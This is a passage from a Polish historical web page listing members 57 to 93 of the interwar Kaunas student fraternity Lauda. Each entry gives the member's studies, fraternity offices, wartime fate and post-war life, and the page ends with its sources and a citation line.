 57. Czesław Mikołajunas, (1906-1990?) c. 1929/30, sekretarz 1931/32, wiceprezes 1932/33, sportowiec, zawodnik, później działacz klubu “Sparta”, prezes Związku Polskiej Młodzieży Akademickiej Litwy, prawnik, w czasie wojny żołnierz AK, aresztowany i wywieziony w Kownie przez Gestapo, wykupiony z więzienia, oficer łącznikowy z Warszawą, uczestnik Powstania Warszawskiego, uciekł z transportu do obozu, po wojnie m.in. pracował w handlu zagranicznym, szef polskiej placówki dyplomatycznej w Lagos, specjalista z zakresu prawa międzynarodowego

  Stanisław Radecki-Mikulicz, 1937 r.

 58. Stanisław Radecki-Mikulicz, (1906 - 1956 w Warszawie) brat Stanisława (Konwent Polonia), studnet farmacji, założyciel Laudy, pierwszy wiceprezes, wiceprezes sem. let. 1932/33, olderman 1933/34, w czasie II wojny światowej Szef Łączności Zewnętrznej Podokręgu Kowno ZWZ-AK, a później Inspektoratu E Okręgu AK Wilno, aresztowany w 1941, pochowany na Powązkach w Warszawie

  Zygmunt Mirowski, 1929 r.

 59. Zygmunt Mirowski, ( - ok. 1968 w Warszawie) absolwent Gimnazjum w Poniewieżu, student prawa Uniwersytetu w Kownie, założyciel Laudy, sekretarz sem. zim. 1929/30, wystąpił w 1930, działacz Zjednoczenia Polaków Studentów Uniwersytetu Witolda Wielkiego w Kownie, prezes 1929, po ekspatriacji w 1946 przyjechał do Polski, pracownik Polskiego Urzędu Repatriacyjnego, a następnie starszy inspektor w Urzędzie Radzie Ministrów, pochowany na Cmentarzu Północnym w Warszawie

  Zbigniew Mockus (Mackiewicz ?), 1929 r.

 60. Zbigniew Mockus, ( - 1939), w kowieńskiej Laudzie, z której wystąpił, student i absolwent (inż. rolnik) SGGW 1929-32, przyjęty do Arkonii 1929 (nr ew. 1096), akt. 1929-32, mieszkał na ziemi nowogrodzkiej, ppor. rez., zmobilizowany poległ w wojnie obronnej 1939

  Stanisław Montwiłł, 1931 r.

 61. Stanisław Montwiłł, (9 czerwca 1883 - po 1938) z gub. kowieńskiej, s. Aleksandra, brat Władysława (Konwent Polonia), uczeń Gimnazjum Miejskiego w Rydze, student i absolwent Wydziału Rolniczego PR 1901-08, przyjęty do Arkonii 1901 (nr ew. 739), właściciel dóbr Antokol w gub. kowieńskiej, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy

  Ksawery Narkiewicz, 1929 r.

 62. Ksawery Narkiewicz, (1904 - 31 grudnia 1980 w Wałbrzychu) c. 1928, olderman sem. zim. 1929/30, prezes 1930/31 i 1932/33, wiceprezes 1931/32, prezez Zarządu Zjednoczenia Polaków Studentów Uniwersytetu Litewskiego, red. I wydawca pisma “Iskry”, lekarz, internista, po wojnie osiadł w Szczawnie Zdroju k. Wałbrzycha

 63. Piotr Jodko-Narkiewicz, (16 marca 1875 - ) z Rygi, uczeń Gimnazjum Miejskiego w Rydze, student Wydziału Mechanicznego PR 1894-1900, przyjęty do Arkonii 1894 (nr ew. 603), po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy
 64. Henryk Niekrasz, lekarz

  Piotr Noskowski, 1936 r.

 65. Piotr Noskowski, ( - zm. w Kownie) c. 1932/33

 66. Stefan Olędzki (Olencki), (16 lipca 1877 - ) z gub. kowieńskiej, s. Romualda, uczeń Gimnazjum w Rydze, student Wydziału Inżynieryjnego PR 1898-1915, przyjęty do Arkonii 1898 (nr ew. 689), po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy
 67. Franciszek Pacowski, (3 października 1912 w Jefremowie w Rosji - 13 czerwca 1994 w Kownie), s. Józefa i Aleksandry z Czechowiczów, absolwent III Gimnazjum Państwowego w Kownie (wykładowy język polski), c. 1935/36, absolwent chemii USB, po wojnie pozostał na Litwie, docent na Uniwersytecie Litewskim w Wilnie

  Konstanty hr. Plater-Zyberk, 1929 r.

 68. Konstanty hr. Plater-Zyberk, (19 kwietnia 1886 w Podzamczu pow. Garwolin - 10 marca 1956 w Gliwicach) z Kurtowian, s. Ludwika (Konwent Polonia) i Teresy z hr. Zamoyskich, brat Stefana (Arkonia), uczeń Gimnazjum w Petersburgu, student Wydziału Rolniczego PR 1910-14, przyjęty do Arkonii 1911 (nr ew. 851), wiceprezes, po I wojnie światowej na Litwie kowieńskiej w miejsc. Biała w pow. Szawle, współzałożyciel i działacz Towarzystwa Oświatowego “Pochodnia”, główny inicjator powstania i opiekun Laudy (przezwisko “Niania”), Filister Arkonii i Laudy, inicjator założenia i Filister honorowy Znicza, po wojnie prowadził państwowe gospodarstwo zielarskie na Pomorzu

 69. Karol Poklewski-Koziełł, (19 lipca 1870 - po 1929) z gub. kowieńskiej, uczeń Szkoły Realnej w Sankt Petersburgu, student Wydziału Rolniczego PR 1891-94, przyjęty do Arkonii 1891 (nr ew. 520), właściciel maj. Kamieniec k. Jedłowka, a od 1909 także Wadwy w gub. kowieńskiej, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy
 70. Witalis Prokopowicz,

  Konstanty ks. Radziwiłł, 1931 r.

 71. Konstanty ks. Radziwiłł, (15 października 1873 w Towianach - 1944/45 w ZSRR) herbu Trąby, z Towian, s. Karola Wilhelma i Stefanii z Broel-Platerów, uczeń Szkoły Realnej w Rydze, student Wydziału Handlowego PR 1894-96, przyjęty do Arkonii 1894 (nr ew. 597), ziemianin, polityk konserwatywny, działacz polski na Litwie kowieńskiej, doradca Józefa Piłsudskiego, w 1918 Związku Ziemian na Litwie, w 1928 współzałożyciel Związku Bojarów Litewskich, współzałożyciel Korporacji Lauda, Filister Arkonii i Laudy, oskarżany przez polską prasę za uległość wobec Litwinów, w wyniku reformy rolnej na Litwie kowieńskiej utracił 90% swoich ziem rodowych, odmówił przyjęcia paszportu ze zlituanizowanym nazwiskiem, aresztowany i wywieziony przez bolszewików zmarł w nieznanych okolicznościach na Wschodzie (prawd. w Taszkiencie bądź na Syberii)

  Zbigniew Ruszczyc, 1937 r.

 72. Zbigniew Ruszczyc, (1914 - 21 stycznia 1990 w Szczecinie) absolwent polskiego Gimnazjum w Wiłkomierzu, c. 1934/35, w czasie II wojny światowej żołnierz AK uczestnik operacji “Ostra Brama” w Wilnie w 1944, internowany przez NKWD w Miednikach, wywieziony w głąb ZSRR, po wojnie osiadł w Szczecinie, filatelista

 73. Zygmunt Rutkowski, (20 czerwca 1877 - po 1929) z Koźliszk w gub. kowieńskiej, absolwent Korpusu Kadetów w Sankt Petersburgu, student Wydziału Inżynieryjnego 1896-97 i Rolniczego 1897-1900, przyjęty do Arkonii 1896 (nr ew. 637), właściciel dóbr Koźliszki w gub. kowieńskiej, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy
 74. Kazimierz Rymgayłło (Rymgajłło), (22 lutego 1878 - po 1929) z gub. kowieńskiej, s. Oswalda, uczeń Szkoły Realna w Rydze, student i absolwent Wydziału Handlowego PR 1898-1903, przyjęty do Arkonii 1898 (nr ew. 688), studiował także na Uniwersytecie w Paryżu, właściciel dóbr Nowe Gliwcze w gub. kowieńskiej, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy

  Jerzy Rymowicz, 1930 r.

 75. Jerzy Rymowicz, ( - po 1945 w Wilnie) c. 1928/29, przed. “Malutki”, wystąpił ok. 1930/31, po wojnie pozostał na Litwie

  Józef Rymowicz, ok. 1930 r.

 76. Józef Rymowicz, ( - ok. 1973 w Warszawie) c. 1929/30, inż., specjalista budownictwa sanitarnego, po wojnie m.in. jeden z budowniczych stadionu X-lecia w Warszawie

 77. Roman Sagatowski, c. 1933/34
 78. Michał Siemaszko, (19 listopada 1869 w Mitawie - po 1929) uczeń Szkoły Realnej w Mitawie, student i absolwent Wydziału Chemicznego PR 1889-95, przyjęty do Arkonii 1889 (nr ew. 449), naczelnik wielkich pieców w Dnieprowskim Towrzystwie Metalurgicznym w gub. jekaterynosławskiej, po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy

  Stefan Sienkiewicz, 1929 r.

 79. Stefan Sienkiewicz, c. 1929/30, i.p. “Sienia”, dr med., po wojnie osiadł we Wrocławiu

  Stanisław Sobolewski, 1929 r.

 80. Stanisław Sobolewski, ( - po 1945 w Wilnie) c. 1928, po wojnie pozostał na Litwie

  <Edmund Sołłohub, 1936 r.

 81. Edmund Sołłohub (Sołohub), (ok. 1900 - ) c. 1933/34

  Jan Sokołowski, 1931 r.Jan (?) Sokołowski, 1974 r.

 82. Jan Sokołowski, (18 września 1906 - 27 listopada 1996 w Elblągu) student prawa UW 1924-29, przyjęty do Arkonii 1926 (nr ew. 1047), akt. 1926-29, Filister Arkonii i Laudy

 83. Zygmunt Stankiewicz,

  Władysław Stomma, 1929 r.

 84. Władysław Stomma, (1903-1981 w Orłowie k. Gdyni) z Jasiuliszek, s. carskiego, a następnie litewskiego generała Witolda, absolwent rosyjskiego Gimnazjum w Kownie, założyciel Laudy, przyd. “Mohrda”, pierwszy prezes, wiceprezes sem. zim. 1929/30, olderman 1930/31, po studiach m.in. nauczyciel Gimnazjum w Wiłkomierzu, w czasie wojny wywieziony przez Sowietów na daleką północ, po wojnie w 1946 osiadł w Gdynii, pochowany w Gdyni-Orłowie

 85. Tadeusz Szemioth, (17 maja 1893 - po 1929) z gub. wileńskiej, s. Mieczysława, uczeń Gimnazjum w Wilnie, student Wydziału Rolniczego PR 1914-16, przyjęty do Arkonii 1914 (nr ew. 891), po I wojnie światowej na Litwie kowieńskiej, Filister Arkonii i Laudy

  Wacław Szołkowski, 1933 r. (?).

 86. Wacław Szołkowski, ( - 1945?) c. 1933/34, dowódca plutonu sanitarnego 9 Dywizji piechoty 2 Armii WP gen. Berlinga, w taborze rannych zaatakowany przez Niemców i rozstrzelany wraz z rannymi przez SS w okolicach Kockau

  <Henryk Szyłkarski, 1929 r.

 87. Henryk Szyłkarski, założyciel Laudy, przyd. “Kot”, pierwszy olderman, prezes sem. zim. 1929/30, po wojnie na emigracji w Australii

  Zygmunt Ugiański, 1929 r.

 88. Zygmunt Ugiański, (9 lipca 1906 w Olicie n. Niemnem - 18 marca 1972 w Warszawie) absolwent Gimnazjum w Kownie, G1098:G1105od 1925 student Uniwersytetu Litewskiego w Kownie, student Wyższej Szkoły Dziennikarskiej w Warszawie 1930/31, współzałożyciel oraz przez trzy lata przewodniczący Zjednoczenia Studentów Polaków Uniwersytetu Litewskiego w Kownie 1925 oraz Związku Polskiej Młodzieży Akademickiej Litwy 1927, c. 1928, olderman 1931/32, prezes sem. let. 1932/33 oraz sem. zim. i sem. let. 1933/34, współzałożyciel i red. miesięcznika studenckiego “Iskry”, publicysta dziennika “Dzień Kowieński”, red. nacz. pisma mniejszości polskiej na Litwie kowieńskiej “Chata Rodzinna” 1937-40, w czasie II wojny światowej Szef Oddziału Propagandy i Prasy dowództwa Podokręgu Kowno ZWZ-AK, później “Inspektorat E” Okręgu AK Wilno (ps. “Redaktor”), w 1946 aresztowany i wywieziony w głąb ZSRR, 1946-48 więzień poprawczego obozu pracy, w 1955 zwolniony przyjechał do Polski, pracownik wydawnictwa PAN w Warszawie, pochowany na cmentarzu na Bródnie w Warszawie, odznaczony przez Prezydenta RP na wychodztwie Srebrnym Krzyżem Zasługi z Mieczami

  Michał Ukiński, 1937 r.

 89. Michał Ukiński, ( - zm. w Warszawie) absolwent Gimnazjum w Telszech, c. 1928, i.p. “Miś”, wiceprezes 1930/31, prezes 1931/32, olderman 1932/33, po wojnie osiadł w Ursusie pod Warszawą, organizator powojennych spotkań Laudan

 90. Zygmunt Wiranowski, student rolnictwa SGGW 1925-28 i UP 1928, przyjęty do Arkonii 1927 (nr ew. 1059), akt. 1927-28, Filister Arkonii i Laudy

  Leon Wojczulewicz, 1931 r.

 91. Leon Wojczulewicz, (18 lipca 1911 w St. Petersburgu - 28 czerwca 1978 w Warszawie) s. Antoniego i Anny z. d. Cziżikov, absolwent Gimnazjum Polskiego w Kownie, student Wydziału Prawa na Uniwersytecie Witolda Wielkiego w Kownie, student i absolwent 1942 Wydziału Prawa Uniwersytetu w Wilnie, c. 1929/30, i.p. “Lońka”, działacz Zjednoczenia Polaków Studentów Uniwersytetu Witolda Wielkiego, m.in. członek Zarządu 1933/34, wiceprezes 1936/37, prezes 1937/38, po ekspatriacji w 1945 do Polski, mieszkał w Gdańsku, Sopocie i Warszawie, pracował w PAN w Warszawie, m.in. na stanowisku inspektora i dyrektora administracyjnego Obserwatorium Astronomicznego, pochowany na Cmentarzu Prawosławnym na Woli w Warszawie

  Henryk Wojnowski, 1936 r.

 92. Henryk Wojnowski, ( - 4 sierpnia 1990 w Kownie na Litwie) c. 1930/31, absolwent Wydziału Matematycznego Uniwrsytetu w Kownie, pozostał na Litwie, uczył matematyki w gimnazjum w Kownie, w latach 80-tych współtwórca Polskiego Zespołu Folklorystycznego “Inkaras” w Kownie

  Zygmunt Woyszyn-Żyliński (?), 1931 r.

 93. Zygmunt Woyszyn-Żyliński, ( - 6 czerwca 1978), student WSH 1927-30, przyjęty do Arkonii 1927 (nr ew. 1056), akt. 1927-33, Filister Arkonii i Laudy

Listę członków opracowano na podstawie:

1) Konrad Łapin, Wstęga Laudy. Zarys historii polskiej korporacji na Litwie, 1989 (wydane na prawach rękopisu),
2) danych z podstrony Muzeum Polskich Korporacji Akademickich poświęconej Arkonii,
3) danych ze strony Laudy,
4) materiałów archiwalnych z Archiwum Korporacyjnego,
5) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Lauda.

Listownik Laudy, druga poł. lat 30-tych.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 23 V 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Lauda w Kownie, (na:) www.archiwumkorporacyjne.pl, stan 23 V 2020 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }